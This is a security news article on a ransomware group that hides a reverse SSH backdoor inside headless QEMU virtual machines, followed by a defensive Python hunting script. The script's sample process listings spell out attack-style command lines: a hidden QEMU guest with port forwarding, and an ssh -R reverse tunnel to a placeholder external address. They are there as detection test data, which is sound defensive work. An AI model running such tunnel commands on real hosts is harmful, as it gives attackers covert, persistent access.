ZCyberNews

Payouts King Ransomware Deploys QEMU VMs as Stealthy Reverse SSH Backdoors

The Payouts King ransomware group is deploying the open-source QEMU emulator to create hidden virtual machines on compromised hosts, establishing a persistent reverse SSH backdoor that evades conventional endpoint detection.


Executive Summary

The Payouts King ransomware operation has adopted a novel defense evasion technique, using the open-source QEMU hardware emulator to create hidden virtual machines on compromised Linux systems. According to analysis by cybersecurity firm Halcyon, the threat actors deploy these VMs to establish a persistent, encrypted reverse SSH backdoor, allowing them to maintain access and execute ransomware payloads from within a virtualized environment that is largely invisible to host-based security tools. This method represents a significant escalation in adversary tradecraft, moving beyond traditional living-off-the-land binaries (LOLBins) to abuse legitimate system virtualization software for stealth.

Technical Analysis

The attack chain begins with the threat actors gaining initial access, typically via compromised credentials or exploitation of vulnerabilities in internet-facing services. Once on a target Linux host, they download and execute a shell script that installs QEMU and its dependencies if they are not already present. The core of the evasion is a minimal, custom-built QEMU virtual machine image, a 34MB Alpine Linux filesystem hosted on the attacker's infrastructure, which the script fetches onto the host.

The attackers then launch the VM headless (no graphical console) with QEMU port forwarding configured. The crucial step is the reverse SSH tunnel: following the standard reverse-tunnel pattern, an SSH client inside the guest opens an outbound connection to an attacker-controlled command-and-control (C2) server and requests remote port forwarding, so the operators can reach the guest's SSH server back through that tunnel. Because the session is initiated from inside the network, it passes egress filtering as ordinary outbound SSH, and every command the operators run travels inside the encrypted channel. Host-based endpoint detection and response (EDR) tools see only a legitimate QEMU binary running; the processes, files and network activity inside the guest are not visible to them, and the traffic that leaves the host is already encrypted. The ransomware payload itself is subsequently executed from within this isolated environment.

Tactics, Techniques & Procedures

Based on the Halcyon report, the observed behaviour maps to the following MITRE ATT&CK framework techniques:

  • T1564.006 (Hide Artifacts: Run Virtual Instance): running the backdoor and the payload inside a headless QEMU guest, where host-based EDR cannot see guest processes or files.
  • T1572 (Protocol Tunneling) and T1573 (Encrypted Channel): the reverse SSH tunnel from the guest to the C2 server, which carries operator commands inside an encrypted, outbound-initiated session.
  • T1105 (Ingress Tool Transfer): downloading the deployment script and the 34MB Alpine Linux VM image from attacker-controlled infrastructure.
  • T1059.004 (Command and Scripting Interpreter: Unix Shell): the shell script that installs QEMU and launches the VM.
  • T1078 (Valid Accounts) and T1190 (Exploit Public-Facing Application): the initial access vectors reported, compromised credentials and exploitation of internet-facing services.
  • T1486 (Data Encrypted for Impact): the ransomware payload itself, preceded by data theft under the group's double-extortion model.

Threat Actor Context

The group behind Payouts King ransomware emerged in early 2026. Halcyon analysts assess that it is a distinct operation rather than a direct rebrand of the known Black Basta ransomware group, though it may share some ideological or tactical lineage. The use of QEMU for stealth is a notable evolution in its operational security. The ransomware itself is written in Go and follows a double-extortion model: data is stolen before encryption and the group threatens to publish it on a dedicated leak site. The targets identified so far are organizations in the manufacturing and technology sectors, but the technique is portable to any Linux host with enough resources to run a small QEMU guest, and a 34MB image sets that bar low.

Mitigations & Recommendations

Organizations should counter this evasion technique with layered defenses. Network-level detection is critical: monitor for outbound SSH connections from hosts that have no business initiating them, especially to unknown external IP addresses, and treat an SSH session whose owning process is QEMU rather than an SSH client as a high-priority alert (with QEMU user-mode networking, the guest's connections are sockets owned by the QEMU process on the host). On the host, apply application allow-listing so that QEMU and other virtualization software cannot be installed or executed on workstations and servers that have no virtualization role, and alert on qemu-system binaries appearing on such hosts. Use behavioral analytics to flag processes that spawn network listeners or establish outbound tunnels. Maintain credential hygiene and patch internet-facing systems to close the initial access vectors Payouts King is reported to use. Finally, segment networks to limit lateral movement, so that a single compromised host running a hidden VM cannot reach the rest of the estate.
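The following is an added example written for this page, not tooling from Halcyon or from the Payouts King operators, that turns the technical analysis and the host-side recommendations above into a concrete hunt. It parses process and socket listings (the `ps` and `ss` lines below are constructed samples, and the SSH destination allow-list is an assumed placeholder) and flags the host-visible artefacts of the technique: a headless QEMU guest on slirp user-mode networking with `hostfwd`, a VM image living in a temp or hidden directory, a QEMU process that owns an outbound TCP connection to port 22 (with user-mode networking the guest's tunnel leaves the host as the QEMU process's own socket), and any `ssh -R` reverse tunnel to a host outside the allow-list.

```python
"""Hunt for host-visible traces of a QEMU-hosted reverse SSH backdoor.
Added example for this page, not Halcyon's or the attackers' tooling. The
ps/ss samples are constructed and the allow-list is an assumed placeholder."""
import os
import re
import shlex

# Constructed sample of `ps -eo pid,ppid,user,args --no-headers` (not real telemetry).
SAMPLE_PS = """\
  812     1 root          /usr/sbin/sshd -D
 2301  2290 nobody        qemu-system-x86_64 -m 256 -nographic -netdev user,id=n0,hostfwd=tcp::2222-:22 -device virtio-net-pci,netdev=n0 -drive file=/tmp/.cache/alpine.img,format=raw
 2400  1300 alice         ssh -L 8080:localhost:80 build.internal.example
 2511  1800 root          ssh -N -R 0.0.0.0:4444:localhost:22 deploy@203.0.113.9
 2600  2590 libvirt-qemu  /usr/bin/qemu-system-x86_64 -name guest=web01 -display none -netdev tap,id=hostnet0,fd=30 -drive file=/var/lib/libvirt/images/web01.qcow2
"""
# Constructed sample of `ss -tnp` (not real telemetry); ss truncates the command name.
SAMPLE_SS = """\
ESTAB 0 0 10.0.0.5:49812 203.0.113.45:22 users:(("qemu-system-x86",pid=2301,fd=14))
ESTAB 0 0 10.0.0.5:41022 10.0.0.9:22 users:(("ssh",pid=2400,fd=3))
ESTAB 0 0 10.0.0.5:51230 203.0.113.9:22 users:(("ssh",pid=2511,fd=3))
"""
# Assumed allow-list of legitimate SSH destinations; tune per environment.
TRUSTED_SSH_DESTS = {"10.0.0.9", "build.internal.example"}

PS_RE = re.compile(r"^\s*(\d+)\s+(\d+)\s+(\S+)\s+(.*)$")
SS_RE = re.compile(r'^\S+\s+\d+\s+\d+\s+(\S+):(\d+)\s+(\S+):(\d+)\s+users:\(\("([^"]+)",pid=(\d+),fd=\d+\)\)')
# OpenSSH options that consume the next token (so it is not mistaken for the destination).
SSH_OPTS_WITH_ARG = set("BbcDEeFIiJLlmOopQRSWw")


def parse_ps(text):
    """Map pid -> {ppid, user, argv} from ps output."""
    procs = {}
    for line in text.splitlines():
        m = PS_RE.match(line)
        if m:
            pid, ppid, user, cmd = m.groups()
            procs[int(pid)] = {"ppid": int(ppid), "user": user, "argv": shlex.split(cmd)}
    return procs


def parse_ss(text):
    """List established TCP connections as {raddr, rport, pid} from ss -tnp output."""
    conns = []
    for line in text.splitlines():
        m = SS_RE.match(line)
        if m:
            conns.append({"raddr": m.group(3), "rport": int(m.group(4)), "pid": int(m.group(6))})
    return conns


def is_qemu(argv):
    return bool(argv) and os.path.basename(argv[0]).startswith("qemu-system-")


def is_headless(argv):
    """-nographic or -display none: no console, which no interactive VM user wants."""
    if "-nographic" in argv:
        return True
    return any(a == "-display" and i + 1 < len(argv) and argv[i + 1] == "none"
               for i, a in enumerate(argv))


def uses_usernet_hostfwd(argv):
    """-netdev user,...,hostfwd=... is slirp user-mode networking: guest traffic
    leaves the host as sockets owned by the QEMU process itself."""
    return any(a.startswith("user,") and "hostfwd=" in a for a in argv)


def drive_paths(argv):
    """Disk images given as -drive file=PATH[,...] (the -hda form is not covered)."""
    return [a[len("file="):].split(",", 1)[0] for a in argv if a.startswith("file=")]


def suspicious_path(path):
    return path.startswith(("/tmp/", "/var/tmp/", "/dev/shm/")) or "/." in path


def ssh_destination(argv):
    """First non-option token of an ssh command line, with any user@ prefix removed."""
    i = 1
    while i < len(argv):
        a = argv[i]
        if a.startswith("-") and len(a) > 1:
            i += 2 if (len(a) == 2 and a[1] in SSH_OPTS_WITH_ARG) else 1
            continue
        return a.rsplit("@", 1)[-1]
    return None


def hunt(ps_text, ss_text, trusted=TRUSTED_SSH_DESTS):
    """Return sorted (pid, rule) findings for the QEMU-backdoor pattern."""
    procs = parse_ps(ps_text)
    findings = set()
    for pid, p in procs.items():
        argv = p["argv"]
        if is_qemu(argv):
            if is_headless(argv) and uses_usernet_hostfwd(argv):
                findings.add((pid, "qemu_headless_usernet"))
            if any(suspicious_path(d) for d in drive_paths(argv)):
                findings.add((pid, "qemu_image_in_tmp"))
        elif argv and os.path.basename(argv[0]) == "ssh" and any(a.startswith("-R") for a in argv[1:]):
            if ssh_destination(argv) not in trusted:
                findings.add((pid, "ssh_reverse_tunnel"))
    for c in parse_ss(ss_text):
        # The guest's own ssh client is invisible on the host; its tunnel shows up
        # as the QEMU process holding an outbound connection to port 22.
        owner = procs.get(c["pid"], {}).get("argv", [])
        if is_qemu(owner) and c["rport"] == 22 and c["raddr"] not in trusted:
            findings.add((c["pid"], "qemu_outbound_ssh"))
    return sorted(findings)


if __name__ == "__main__":
    for pid, rule in hunt(SAMPLE_PS, SAMPLE_SS):
        print(f"pid {pid}: {rule}")
```

Run `ps -eo pid,ppid,user,args --no-headers` and `ss -tnp` as root and feed their output to `hunt()`. On the sample, the hand-launched guest (pid 2301) trips three rules and the stray reverse tunnel (pid 2511) one, while the libvirt-managed guest on tap networking with its image under `/var/lib/libvirt` is left alone. The allow-list and the temp-directory heuristic are the two knobs to tune before deploying this on a fleet.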
